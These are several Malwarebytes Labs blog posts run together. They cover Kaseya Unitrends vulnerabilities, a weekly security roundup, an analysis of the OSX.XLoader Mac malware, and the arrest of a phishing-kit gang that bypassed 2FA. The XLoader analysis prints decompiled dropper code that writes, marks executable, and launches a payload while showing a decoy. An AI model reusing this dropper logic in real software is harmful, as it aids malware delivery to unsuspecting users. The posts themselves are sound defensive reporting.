So, in this case, the DIVD informed Kaseya Unitrends about the details of the vulnerability and started sharing it with 68 government Computer Emergency Response Teams (CERTs) under the TLP:AMBER designation. When sharing cyber intelligence, sources may use TLP:AMBER when information requires support to be effectively acted upon, but carries risk to privacy, reputation, or operations if shared outside of the organizations involved.

Recipients are supposed to limit the sharing of TLP:AMBER information with staff in their own organization who need to know, or with service providers to mitigate risks to the member’s organization if the providers are contractually obligated to protect the confidentiality of the information. Information can be shared with those parties specified above only as widely as necessary to act on the information.

One of the recipients, however, publicized the content by uploading it to an online analyzing platform.

“An employee uploaded the TLP: AMBER labeled directly to an online analyzing platform and shared its content to all participants of that platform; because we do not have an account on that platform, we immediately requested removing this file.”

The vulnerabilities affecting the Kaseya Unitrends backup service include a mixture of authenticated remote code execution, authenticated privilege escalation, and unauthenticated remote code execution on the client side. A threat actor would need a valid user to perform remote code execution or privilege escalation on the publicly exposed Kaseya Unitrends service. Furthermore, threat actors would already need to have breached a customer network to exploit the unauthenticated client RCE. This reduces the chance of these vulnerabilities having the same impact as the REvil attack that exploited one of the vulnerabilities within Kaseya VSA.

Stay safe, everyone!

The post Kaseya Unitrends has unpatched vulnerabilities that could help attackers expand a breach appeared first on Malwarebytes Labs.

Last week on Malwarebytes Labs:

• Stopransomware(dot)gov, a one-stop hub for ransomware resources
• Beware, crypto-scammer seeks foreigner with BLOCK CHAIN ACCOUNT
• Remcos RAT delivered via Visual Basic
• US, EU, UK, NATO blame China for “reckless” exchange attacks
• HiveNightmare zero-day lets anyone be SYSTEM on Windows 10 and 11
• ID theft ghouls targeting Surfside victims is appalling, but no surprise
• The life and death of the ZeuS Trojan
• Pegasus spyware has been here for years. We must stop ignoring it
• Millions of Windows machines affected by ancient printer vulnerability
• Five years for swatter who caused a man’s death for a Twitter handle
• Busted! Fraud as a service gang that sold 2FA-proof phishing arrested
• CNA legal filings lift curtain on a Phoenix cryptolocker ransomware attack
• Avoslocker enters the ransomware scene, asks for partners

Other cybersecurity news

• Pegasus spyware seller: blame our customers, not us, for hacking (Source: BBC)
• A favourite target of Russian hackers, the Olympics are on guard (Source: NBC)
• UK national suspected of hacking Twitter accounts of Joe Biden and Barack Obama is arrested in Southern Spain (Source: El Pais)
• Japan government says companies are being targeted by China-backed cyber hacking group (Source: Reuters)
• New Zealand, China clash over hacking claims (Source: VOA)
• Phishing attacks get smarter as targets struggle to keep up (Source: VentureBeat)
• Discord hosts “significant volumes of malware” in its CDN (Source: The Register)
• Hacker group threatening to sell 1TB of Saudi Aramco data to the highest bidder (Source: TIESS)
• 40 percent of individuals fell victim to a phishing attack in the past month (Source: Help Net Security)
• India and Vietnam rank on list as those most hit by Android malware (Source: Tech Wire Asia)

Stay safe, everyone!

The post A week in security (July 19 – July 25) appeared first on Malwarebytes Labs.

Last week, Check Point Research described a new Mac variant of malware they call XLoader. It was identified as being the successor of something called Formbook, a very prevalent threat in the Windows world. According to Check Point, the Mac version of the malware is being “rented” as part of a malware-as-a-service program, at the price of $49 for one month or $99 for three months.

Unfortunately, Check Point was a bit vague on the details of how the Mac version behaves, leaving folks unsure of exactly how to protect themselves against this malware. Fortunately, more details have since come to light.

How XLoader gets installed

XLoader appears to be distributed within a .jar – or Java archive – file. Such a file contains code that can be executed by Java, dropping the malware on the system. One major advantage, for the attacker, of using Java is that the “dropper” (the file responsible for installing the malware) can be cross-platform.

However, this file format has a very significant disadvantage for the attacker, which is that macOS does not, by default, include Java, and has not for quite some time. Back around 2011 to 2012, there was a flood of multiple different pieces of malware designed to infect Macs via vulnerabilities in Java, which at the time was installed on every Mac out of the box. This meant that all Macs were vulnerable, and to make matters worse, despite updates from Oracle (Java’s owner), more vulnerabilities kept being found and exploited.

Apple responded by ripping Java out of the system. Since then, the only way Java can be on a system is if the user has installed it, which most users won’t. This means that Java is no longer a very useful means of attack on modern macOS systems.

There can be a couple reasons why a JAR file might be used on macOS. One is unfamiliarity with modern macOS, from a malware developer who has Java on their system but doesn’t understand this is non-standard for some reason. This is something often seen with more amateurish malware, and there are definitely some indications of that with this malware.

However, another reason is that the malware is targeted at specific individuals who are known to have Java installed. These could be Java developers, for example, at a particular company, or perhaps employees at a company that uses Java-based tools. A source at ESET reported that they had detected this malware back in January, with the JAR file being distributed via email. This points to a targeted campaign.

The installation process

The dropper – named Statement SKBMT 09818.jar in this case – would need to be opened by the user. The good news is that, if it was downloaded from an email client or browser that uses modern file system code, it will be marked with a “quarantine” flag. This means that the Gatekeeper feature of macOS will not allow it to execute by default.

There are ways that Mac users can bypass this and open the file anyway, but not without seeing a similar warning first.

Still, a significant amount of Mac malware droppers in the last year or so have been unsigned, and have given users instructions on what to expect and how to open the file. In such cases, users can and do bypass these warnings and open the malicious installers successfully.

In the event that the user downloads the JAR file using an email client that does not use the right file system code, and thus does not set a quarantine flag, the file will immediately open when double-clicked, without any complaints. The same will also be true if the file is copied onto a non-Mac drive before being opened, such as a Windows network share, where the quarantine flag will be lost.

Once opened, the JAR file will infect the system, and strangely, will also open a .ico (icon) file containing a Microsoft word icon image.

It’s unknown why this is done. It’s not uncommon for malware to open a “decoy document.” In such cases, when the malware pretends to be a document (as in this case, where the malware is pretending to be a statement of some kind), it will then open a document for the user to look at, to assuage suspicions the user would have if no document ever opened, while it’s doing bad stuff behind the scenes.

Is this a really badly botched attempt to open a decoy document? Or is it possible that this wasn’t meant as a public release, and the file being opened is a placeholder? Either would be a reasonable explanation, but we don’t know which is true.

While the user is looking in confusion at this wonderful icon, the JAR code will install the malware in the background. On my test machine, the malware installed the following items:

~/._p1pxXl0Fz4/I8ppUnip.app
~/kIbwf02l
~/NVFFY.ico
~/LaunchAgents/com._p1pxXl0Fz4.I8ppUnip.plist

The launch agent .plist file is used to load the app from the hidden folder (._p1pxXl0Fz4) found in the user folder. The kIbwf02l file is an exact copy of the Mac mach-o executable file found inside the app, but it’s unclear why this is left there, as it isn’t actually used. It’s a suspiciously-named file that will be visible to the user and thus may raise suspicions, so its presence is odd.

The NVFFY.ico file is the Microsoft Word icon file opened by the malware as a “decoy.”

A closer look at the Java code

Extracting the Java code from the JAR file was a painless task, and the code is not obfuscated in any way. The code is quite simple, but is able to drop a payload on either Windows or Mac. If you’re not interested in looking at code, feel free to skip ahead.

The filenames are hard-coded in the JAR file, as seen here.

private static String get_crypted_filename(final int pt) {
    final String exe_ = "fI4sWHkeeeee";
    final String mach_o = "kIbwf02ldddd";
    final String display = "NVFFYfffffff";

It’s a bit of a stretch to call these filenames “encrypted,” as the only thing that has been done to them is that a specific letter has been added to the end, repeating a varying number of times. (What letter is used depends on the string in question, and is also hard-coded.) These characters are stripped off to get the filenames, resulting in the mach-o filename of kIbwf02l and the “display” document filename of NVFFY.

The malware has quite simple code for determining the system it’s running on:

public static int _GetOS() {
    final String OS = System.getProperty("os.name").toLowerCase();
    if (OS.contains("mac")) {
        return 1;
    }
    if (OS.contains("win")) {
        return 2;
    }
    return 0;
}

From there, the malware reads encrypted data from within the JAR file and writes it out to the desired location on the system (in this case, the kIbwf02l file).

private byte[] getFileFromResource(final String name) throws Exception {
    try (final InputStream in = this.getClass().getResourceAsStream("/resources/" + name)) {
        final byte[] data = new byte[16384];
        final ByteArrayOutputStream buffer = new ByteArrayOutputStream();
        int nRead;
        while ((nRead = in.read(data, 0, data.length)) != -1) {
            buffer.write(data, 0, nRead);
        }
        return buffer.toByteArray();
    }
}

From there, the malware launches the malicious process and opens the decoy document (aka “displayFile”).

        if (osFile != null && osFile.length != 0) {
            final String absolutePath = userPath + osFilename + ((os == 1) ? "" : ".exe");
            stubClass.writeBufferToFile(decrpt_data(osFile), absolutePath);
            if (os == 1) {
                final File file = new File(absolutePath);
                final Set<PosixFilePermission> perms = new HashSet<PosixFilePermission>();
                perms.add(PosixFilePermission.OWNER_READ);
                perms.add(PosixFilePermission.OWNER_WRITE);
                perms.add(PosixFilePermission.OWNER_EXECUTE);
                Files.setPosixFilePermissions(file.toPath(), perms);
            }
            processBuilder.command(absolutePath);
            processBuilder.start();
        }
        final byte[] displayFile = stubClass.getFileFromResource(displayFilename);
        if (displayFile != null && displayFile.length != 0) {
            final String absolutePath2 = userPath + displayFilename + getDisplayExt();
            stubClass.writeBufferToFile(decrpt_data(displayFile), absolutePath2);
            final File f = new File(absolutePath2);
            Desktop.getDesktop().open(f);
        }

The malicious application

The malicious Mac application, dropped and executed by the JAR file, is heavily obfuscated, making it hard to learn more about what it does. According to analysis done by SentinelOne, one of the app’s main goals appears to be harvesting credentials.

The app itself is not code signed in any way. However, since it was created by the JAR and not downloaded from anywhere, it can be executed without Gatekeeper examining it or asking for user consent to run it. The launch agent .plist file is used to ensure the app is launched at startup, but explicitly does not try to keep the process alive. This means that if anything terminates the malicious process, it will not re-open until the next reboot.

The app itself has been marked as an LSUIElement, which is done to prevent its icon from showing on the Dock whenever it is running. This is a feature intended to be used by apps responsible for managing some user interface element – such as a menu bar icon – but that do not have a user interface of their own and thus can’t be interacted with directly. This prevents the Dock from being littered with these kinds of apps, but is a common technique used to prevent malicious apps from appearing in the Dock.

TL;DR

To sum up, this malware is likely to be used for targeted attacks against intended victims who are known to have Java installed. Attackers may also have knowledge that something in the victims’ environment will enable users to easily open a JAR file without being blocked by Gatekeeper.

The dropper itself is completely unsophisticated, with barely an attempt to hide anything, while the mach-o executable used in the malicious application installed on the system is quite well protected against prying eyes. This may be an indication that the two components of the malware were developed by different individuals.

This malware will be detected by Malwarebytes for Mac as OSX.XLoader. However, as of yet, data shows that Malwarebytes has not detected a single instance of this malware in the wild.

The post OSX.XLoader hides little except its main purpose: What we learned in the installation process appeared first on Malwarebytes Labs.

The Dutch police announced that they arrested two Dutch citizens, aged 24 and 15, for developing and selling phishing panels. The police also searched the house of another suspect, an 18 year old who was not arrested.

The people behind this illegal business called themselves the Fraud Family and were active on Telegram to sell their panels to interested parties. For cybercriminals that lacked the technical knowledge or means, the Fraud Family also offered to host the phishing sites and backend panels.

Group-IB

During their investigation the police received help from the threat intelligence firm Group-IB that specializes in investigating and preventing cybercrimes. Group-IB published a blogpost that goes into detail about the activities of the Fraud Family and the different panels that were developed by them. If you are interested in more details about the phishing methods, their blog is well worth the read.

2FA bypass

The developers of these phishing kits made sure their customers, fellow cybercriminals, could bypass 2FA. The crooks who use this phishing infrastructure get access to a web panel that interacts, in real time, with the phishing site. When victims submit their banking credentials, the phishing site sends them to the web panel where the fraudster is waiting. This one actually notifies the scammers that a new victim is online. The scammers will lie waiting because the scammers need to react fast enough so they can then request the additional information that will help them to gain access to the bank accounts, two factor authentication tokens, and personal identifiable information (PII). While the phishing site is waiting for further instructions from the attackers, the unsuspecting victim is looking at a “Please wait…” screen.

The lures

The phishers themselves were free to set up methods to get their victims to the phishing sites that were designed to look exactly like the real, legitimate websites. Well-known tactics include phishing emails and texts that ask for urgent, but usually small payments as not to raise suspicion. Another is to act as an interested buyer on an online platform and ask for a 1 cent payment to verify that the seller is not a scammer.

The amount the scammers ask for is not relevant for the end-result as the scammers can enter any number they like on the real banking site while they wait for the victim to provide them with the necessary details.

Delay takedowns

Any successful phishing site will eventually get reported and taken down, or blocked. But the time that such sites stay alive can be prolonged by using certain precautions. The more important part of the service are the panels, and the Fraud Family offered a “plug and play” phishing service that kept the framework under control and prevented it from leaking to the public. By using anti-bot tools developers can prevent crawlers, automated analysis tools, and services like VirusTotal and URLScan from accessing the phishing sites, as well as make it harder for researchers to find them.

Mitigation

There are a few methods for victims to avoid phishing scams that could lead to emptied bank accounts. These are a few pointers to keep in mind:

• Be mindful when providing payment details even if you are only making a small payment. Behind the scenes someone could be altering the number.
• Always go to your banking site directly. Do not use a link provided in a mail or text. Save a shortcut in your browser if you find typing to cumbersome or if you want to avoid typo squatting.
• Double check the payment request with the party that sent it to you by using another method of communication.
• If someone, even if you think it’s one of your loved ones, sends you a text to tell you they have a new phone number, call them on the number you have on record to verify.
• Banks and other reputable organizations do not use URL shorteners when they send you a link.
• Check the information of the website in the address bar. The green padlock is needed but not enough.
• If you think you may be a victim of a phishing attack, quickly communicate with your bank, the organization being impersonated by the fraudsters, and the police. They can issue an alert which may help others and maybe limit the damage.
• Use a password manager. A password manager will not fill out your details if the website’s domain does not fit what it has on record.

For banks:

Do better 2FA than sending verification codes that can be passed along from victims to scammers. Dutch research last year showed that the customers of some banks fall victim more often than others and not because those banks are bigger. Instead, it is because they use less reliable 2FA methods. It’s a lot easier for a scammer to ask their victim for a 4 digit code than it is to get to show them a QR code. And this whole type of scam falls apart if the bank login procedure relies on a hardware key.

Stay safe, everyone!

The post Busted! Fraud-as-a-Service gang that sold 2FA-proof phishing arrested appeared first on Malwarebytes Labs.